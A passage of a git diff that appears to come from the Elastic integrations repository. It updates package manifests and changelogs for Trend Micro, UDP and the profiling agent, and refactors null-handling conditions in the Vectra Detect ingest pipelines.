--- a/packages/trendmicro/manifest.yml +++ b/packages/trendmicro/manifest.yml @@ -1,41 +1,42 @@ format_version: "3.0.0" name: trendmicro -title: "Trendmicro" -version: "1.8.4" -description: "collect Trendmicro Deep Security events with elastic agent." +title: Trend Micro Deep Security +version: "2.2.0" +description: Collect logs from Trend Micro Deep Security with Elastic Agent. type: integration categories: - network + - edr_xdr - security conditions: kibana: - version: "^8.6.0" + version: "^8.11.0" elastic: - subscription: "basic" + subscription: basic screenshots: - - src: /img/trend-micro-deep-security-dashboard-screenshot.png + - src: /img/trendmicro-deep_security-dashboard.png title: Trend Micro Deep Security Overview Screenshot size: 600x600 type: image/png icons: - - src: /img/Trend-Micro-Logo.svg + - src: /img/trend-micro-logo.svg title: Trendmicro logo size: 32x32 type: image/svg+xml policy_templates: - name: trendmicro - title: Trendmicro Deep Security logs - description: Collect deep security logs + title: Trend Micro Deep Security logs + description: Collect Deep Security logs. inputs: - - type: filestream - title: "Collect Trendmicro Deep Security logs (input: filestream)." - description: "Collecting deep security logs from instances (input: filestream)." - - type: udp - title: "Collect CEF Deep Security logs (input: udp)" - description: "Collecting deep security logs from CEF instances (input: udp)." - type: tcp - title: "Collect CEF Deep Security logs (input: tcp)" - description: "Collecting deep security logs from CEF instances (input: tcp)." + title: Collect logs from Trend Micro Deep Security via TCP + description: Collecting logs from Trend Micro Deep Security via TCP. + - type: udp + title: Collect logs from Trend Micro Deep Security via UDP + description: Collecting logs from Trend Micro Deep Security via UDP. + - type: filestream + title: Collect logs from Trend Micro Deep Security via Filestream + description: Collecting logs from Trend Micro Deep Security via File. owner: - github: elastic/sec-deployment-and-devices - type: community + github: elastic/security-service-integrations + type: elastic diff --git a/packages/udp/changelog.yml b/packages/udp/changelog.yml index 3287aa0a4b2..c66f569dd03 100644 --- a/packages/udp/changelog.yml +++ b/packages/udp/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.19.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.18.1" changes: - description: Changed owners diff --git a/packages/udp/manifest.yml b/packages/udp/manifest.yml index 8c41e1f2c40..b22314418b0 100644 --- a/packages/udp/manifest.yml +++ b/packages/udp/manifest.yml @@ -1,9 +1,9 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: udp title: Custom UDP Logs description: Collect raw UDP data from listening UDP port with Elastic Agent. type: integration -version: "1.18.1" +version: "1.19.0" conditions: kibana: version: "^8.2.1" diff --git a/packages/universal_profiling_agent/agent/input/input.yml.hbs b/packages/universal_profiling_agent/agent/input/input.yml.hbs index 34695de8eed..2228d1bcfdb 100644 --- a/packages/universal_profiling_agent/agent/input/input.yml.hbs +++ b/packages/universal_profiling_agent/agent/input/input.yml.hbs @@ -4,3 +4,4 @@ pf-host-agent: connect_proxy: {{profiler.connect_proxy}} probabilistic_threshold: {{profiler.probabilistic_threshold}} probabilistic_interval: {{profiler.probabilistic_interval}} + disable_tls: {{profiler.disable_tls}} diff --git a/packages/universal_profiling_agent/changelog.yml b/packages/universal_profiling_agent/changelog.yml index 9276394160b..d397b35de69 100644 --- a/packages/universal_profiling_agent/changelog.yml +++ b/packages/universal_profiling_agent/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: 8.13.2 + changes: + - description: Add disable_tls option + type: enhancement + link: https://github.com/elastic/integrations/pull/9523 - version: 8.12.0 changes: - description: Add privileges section and update to 3.0.2 format diff --git a/packages/universal_profiling_agent/manifest.yml b/packages/universal_profiling_agent/manifest.yml index 0001ed57cda..9f8d53f1db3 100644 --- a/packages/universal_profiling_agent/manifest.yml +++ b/packages/universal_profiling_agent/manifest.yml @@ -1,11 +1,11 @@ name: profiler_agent title: Universal Profiling Agent -version: 8.12.0 +version: 8.13.2 categories: ["elastic_stack", "monitoring"] description: Fleet-wide, whole-system, continuous profiling with zero instrumentation. conditions: kibana: - version: ^8.12.0 + version: ^8.13.2 elastic: subscription: basic format_version: 3.0.2 @@ -56,6 +56,12 @@ policy_templates: description: Time interval for which probabilistic profiling will be enabled or disabled. (default 1m0s) show_user: true type: text + - name: profiler.disable_tls + title: Disable TLS + description: Disable encryption for data in transit. (default false) + show_user: true + type: bool + default: false multiple: false agent: privileges: diff --git a/packages/vectra_detect/changelog.yml b/packages/vectra_detect/changelog.yml index bcaf85bdd7c..c048b595383 100644 --- a/packages/vectra_detect/changelog.yml +++ b/packages/vectra_detect/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.8.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9521 +- version: "1.7.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9151 - version: "1.7.1" changes: - description: Changed owners diff --git a/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml index b88e8f233be..d8ab55a55b3 100644 --- a/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml +++ b/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml @@ -9,3 +9,6 @@ fields: tags: - preserve_original_event - preserve_duplicate_custom_fields +numeric_keyword_fields: + - vectra_detect.log.host.groups.id + - vectra_detect.log.host.groups.triage_filters.id \ No newline at end of file diff --git a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml index 300e0eb589a..ab9d670a404 100644 --- a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -7,3 +7,6 @@ data_stream: listen_port: 9025 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - vectra_detect.log.host.groups.id + - vectra_detect.log.host.groups.triage_filters.id \ No newline at end of file diff --git a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml index 9095f53f86b..c104905f041 100644 --- a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml +++ b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml @@ -59,3 +59,6 @@ data_stream: -----END CERTIFICATE----- preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - vectra_detect.log.host.groups.id + - vectra_detect.log.host.groups.triage_filters.id \ No newline at end of file diff --git a/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml index 96a5085af49..769f35216e9 100644 --- a/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml @@ -7,3 +7,6 @@ data_stream: listen_port: 9025 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - vectra_detect.log.host.groups.id + - vectra_detect.log.host.groups.triage_filters.id \ No newline at end of file diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml index bf140708d45..53214fb5ff1 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -110,10 +110,10 @@ processors: ignore_empty_value: true - pipeline: name: '{{ IngestPipeline "pipeline-host-detection" }}' - if: (ctx.vectra_detect?.log?.event_type == 'vectra_json_v2' || ctx.vectra_detect?.log?.event_type == 'vectra_json') && ctx.json?.category != 'HOST SCORING' + if: "['vectra_json_v2', 'vectra_json'].contains(ctx.vectra_detect?.log?.event_type) && ctx.json?.category != 'HOST SCORING'" - pipeline: name: '{{ IngestPipeline "pipeline-host-scoring" }}' - if: (ctx.vectra_detect?.log?.event_type == 'vectra_json_v2' || ctx.vectra_detect?.log?.event_type == 'vectra_json') && ctx.json?.category == 'HOST SCORING' + if: "['vectra_json_v2', 'vectra_json'].contains(ctx.vectra_detect?.log?.event_type) && ctx.json?.category == 'HOST SCORING'" - pipeline: name: '{{ IngestPipeline "pipeline-account-scoring" }}' if: ctx.vectra_detect?.log?.event_type == 'vectra_json_account_v2' @@ -146,9 +146,9 @@ processors: - remove: field: event.original ignore_missing: true - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true - remove: - if: ctx.tags == null || !(ctx.tags.contains("preserve_duplicate_custom_fields")) + if: ctx.tags?.contains('preserve_duplicate_custom_fields') != true field: - vectra_detect.log.account.id - vectra_detect.log.account.name diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml index bbd2798f7a4..8271fcd0b4d 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml @@ -47,7 +47,7 @@ processors: - json: field: json.service_info tag: 'json_to_split_service_info' - if: ctx.json?.service_info != null && ctx.json.service_info instanceof String + if: ctx.json?.service_info instanceof String on_failure: - append: field: error.message @@ -58,7 +58,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.info - if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List + if: ctx.vectra_detect?.log?.service?.info instanceof List processor: convert: field: _ingest._value.count @@ -72,7 +72,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.info - if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List + if: ctx.vectra_detect?.log?.service?.info instanceof List ignore_missing: true processor: append: @@ -81,7 +81,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.service.info - if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List + if: ctx.vectra_detect?.log?.service?.info instanceof List ignore_missing: true processor: remove: @@ -104,7 +104,7 @@ processors: field: vectra_detect.log.account.uid tag: 'dissect_account_uid' pattern: '%{vectra_detect.log.account.user_id}@%{user.domain}' - if: ctx.vectra_detect?.log?.account?.uid.contains('@') + if: ctx.vectra_detect?.log?.account?.uid?.contains('@') == true on_failure: - append: field: error.message @@ -129,7 +129,7 @@ processors: - json: field: json.account_info tag: 'json_to_split_account_info' - if: ctx.json?.account_info != null && ctx.json.account_info instanceof String + if: ctx.json?.account_info instanceof String on_failure: - append: field: error.message @@ -140,7 +140,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.account.info - if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List + if: ctx.vectra_detect?.log?.account?.info instanceof List processor: convert: field: _ingest._value.count @@ -154,7 +154,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.account.info - if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List + if: ctx.vectra_detect?.log?.account?.info instanceof List ignore_missing: true processor: append: @@ -163,7 +163,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.account.info - if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List + if: ctx.vectra_detect?.log?.account?.info instanceof List ignore_missing: true processor: remove: diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml index 59eeae4ebac..dc157ef6eb3 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml @@ -26,11 +26,11 @@ processors: - set: field: event.outcome value: success - if: ctx.vectra_detect?.log?.success != null && ctx.vectra_detect.log.success + if: ctx.vectra_detect?.log?.success == true - set: field: event.outcome value: failure - if: ctx.vectra_detect?.log?.success != null && !ctx.vectra_detect.log.success + if: ctx.vectra_detect?.log?.success == false - rename: field: json.href target_field: vectra_detect.log.href diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml index 3ef2a04bf2b..cdea6ba7877 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml @@ -152,7 +152,7 @@ processors: - json: field: json.host_access_history tag: 'json_to_split_host_access_history' - if: ctx.json?.host_access_history != null && ctx.json.host_access_history instanceof String + if: ctx.json?.host_access_history instanceof String on_failure: - append: field: error.message @@ -163,7 +163,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.host.access_history - if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List + if: ctx.vectra_detect?.log?.host?.access_history instanceof List processor: convert: field: _ingest._value.id @@ -176,7 +176,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.host.access_history - if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List + if: ctx.vectra_detect?.log?.host?.access_history instanceof List processor: date: field: _ingest._value.lastSeen @@ -186,7 +186,7 @@ processors: ignore_failure: true - foreach: field: vectra_detect.log.host.access_history - if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List + if: ctx.vectra_detect?.log?.host?.access_history instanceof List processor: convert: field: _ingest._value.privilege @@ -200,7 +200,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.host.access_history - if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List + if: ctx.vectra_detect?.log?.host?.access_history instanceof List processor: rename: field: _ingest._value.privilegeCategory @@ -208,7 +208,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.host.access_history - if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List + if: ctx.vectra_detect?.log?.host?.access_history instanceof List processor: remove: field: @@ -218,7 +218,7 @@ processors: - json: field: json.service_access_history tag: 'json_to_split_service_access_history' - if: ctx.json?.service_access_history != null && ctx.json.service_access_history instanceof String + if: ctx.json?.service_access_history instanceof String on_failure: - append: field: error.message @@ -229,7 +229,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: convert: field: _ingest._value.id @@ -242,7 +242,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: date: field: _ingest._value.lastSeen @@ -252,7 +252,7 @@ processors: ignore_failure: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: convert: field: _ingest._value.privilege @@ -266,7 +266,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: rename: field: _ingest._value.privilegeCategory @@ -274,7 +274,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List ignore_missing: true processor: append: @@ -283,7 +283,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: remove: field: diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml index 35ef3b18b46..286ade2e27c 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml @@ -8,22 +8,22 @@ processors: field: event.category value: session allow_duplicates: false - if: ctx.json?.message != null && ctx.json.message.contains('session') + if: ctx.json?.message?.contains('session') == true - append: field: event.category value: authentication allow_duplicates: false - if: ctx.json?.message != null && (ctx.json.message.contains('authentication') || ctx.json.message.contains('log in')) + if: ctx.json?.message?.contains('authentication') == true || ctx.json?.message?.contains('log in') == true - append: field: event.category value: configuration allow_duplicates: false - if: ctx.json?.message != null && ctx.json.message.contains('configuration') + if: ctx.json?.message?.contains('configuration') == true - append: field: event.type value: end allow_duplicates: false - if: ctx.json?.message != null && (ctx.json.message.contains('timeout') || ctx.json.message.contains('log in')) + if: ctx.json?.message?.contains('timeout') == true || ctx.json?.message?.contains('log in') == true - rename: field: json.result target_field: vectra_detect.log.result @@ -31,15 +31,15 @@ processors: - set: field: event.outcome value: success - if: ctx.vectra_detect?.log?.result != null && ['success', 'true'].contains(ctx.vectra_detect.log.result.toLowerCase()) + if: "'success'.equalsIgnoreCase(ctx.vectra_detect?.log?.result) || 'true'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)" - set: field: event.outcome value: failure - if: ctx.vectra_detect?.log?.result != null && ['failure', 'false'].contains(ctx.vectra_detect.log.result.toLowerCase()) + if: "'failure'.equalsIgnoreCase(ctx.vectra_detect?.log?.result) || 'false'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)" - set: field: event.outcome value: unknown - if: ctx.vectra_detect?.log?.result != null && ['pending'].contains(ctx.vectra_detect.log.result.toLowerCase()) + if: "'pending'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)" - rename: field: json.dvchost target_field: vectra_detect.log.dvchost diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml index ce69f09d3e4..2d99cd3d380 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml @@ -578,7 +578,7 @@ processors: - json: field: json.service_info tag: 'json_to_split_service_info' - if: ctx.json?.service_info != null && ctx.json.service_info instanceof String + if: ctx.json?.service_info instanceof String on_failure: - append: field: error.message @@ -589,7 +589,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.info - if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List + if: ctx.vectra_detect?.log?.service?.info instanceof List processor: convert: field: _ingest._value.count @@ -603,7 +603,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.info - if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List + if: ctx.vectra_detect?.log?.service?.info instanceof List ignore_missing: true processor: append: @@ -612,7 +612,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.service.info - if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List + if: ctx.vectra_detect?.log?.service?.info instanceof List ignore_missing: true processor: remove: @@ -622,7 +622,7 @@ processors: - json: field: json.account_info tag: 'json_to_split_account_info' - if: ctx.json?.account_info != null && ctx.json.account_info instanceof String + if: ctx.json?.account_info instanceof String on_failure: - append: field: error.message @@ -633,7 +633,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.account.info - if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List + if: ctx.vectra_detect?.log?.account?.info instanceof List processor: convert: field: _ingest._value.count @@ -647,7 +647,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.account.info - if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List + if: ctx.vectra_detect?.log?.account?.info instanceof List ignore_missing: true processor: append: @@ -656,7 +656,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.account.info - if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List + if: ctx.vectra_detect?.log?.account?.info instanceof List ignore_missing: true processor: remove: diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml index f4fb4663c82..f9c21393f67 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml @@ -32,11 +32,11 @@ processors: - set: field: event.outcome value: success - if: ctx.vectra_detect?.log?.success != null && ctx.vectra_detect.log.success + if: ctx.vectra_detect?.log?.success == true - set: field: event.outcome value: failure - if: ctx.vectra_detect?.log?.success != null && !ctx.vectra_detect.log.success + if: ctx.vectra_detect?.log?.success == false - rename: field: json.host_name target_field: vectra_detect.log.host.name diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml index 5b83ab95c3a..7eacf6202e4 100644 --- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml +++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml @@ -51,14 +51,14 @@ processors: - json: field: json.host_groups tag: 'json_to_split_host_groups' - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof String + if: ctx.json?.host_groups instanceof String on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: rename: field: _ingest._value.groupType @@ -66,7 +66,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: rename: field: _ingest._value.lastModifiedBy @@ -74,7 +74,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: foreach: field: _ingest._value.triageFilters @@ -86,7 +86,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: rename: field: _ingest._value.triageFilters @@ -94,7 +94,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.cognitoManaged @@ -108,7 +108,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.canEdit @@ -122,7 +122,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.canDelete @@ -136,7 +136,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: date: field: _ingest._value.lastModified @@ -146,7 +146,7 @@ processors: ignore_failure: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.filterCount @@ -160,7 +160,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: remove: field: @@ -344,7 +344,7 @@ processors: - json: field: json.detection_profile tag: 'json_to_split_detection_profile' - if: ctx.json?.detection_profile != null && ctx.json.detection_profile instanceof String + if: ctx.json?.detection_profile instanceof String on_failure: - append: field: error.message @@ -360,7 +360,7 @@ processors: - json: field: json.account_access_history tag: 'json_to_split_account_access_history' - if: ctx.json?.account_access_history != null && ctx.json.account_access_history instanceof String + if: ctx.json?.account_access_history instanceof String on_failure: - append: field: error.message @@ -371,7 +371,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: convert: field: _ingest._value.id @@ -384,7 +384,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: date: field: _ingest._value.lastSeen @@ -394,7 +394,7 @@ processors: ignore_failure: true - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: convert: field: _ingest._value.privilege @@ -408,7 +408,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: rename: field: _ingest._value.privilegeCategory @@ -416,7 +416,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List ignore_missing: true processor: append: @@ -425,7 +425,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: remove: field: @@ -435,7 +435,7 @@ processors: - json: field: json.service_access_history tag: 'json_to_split_service_access_history' - if: ctx.json?.service_access_history != null && ctx.json.service_access_history instanceof String + if: ctx.json?.service_access_history instanceof String on_failure: - append: field: error.message @@ -446,7 +446,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history 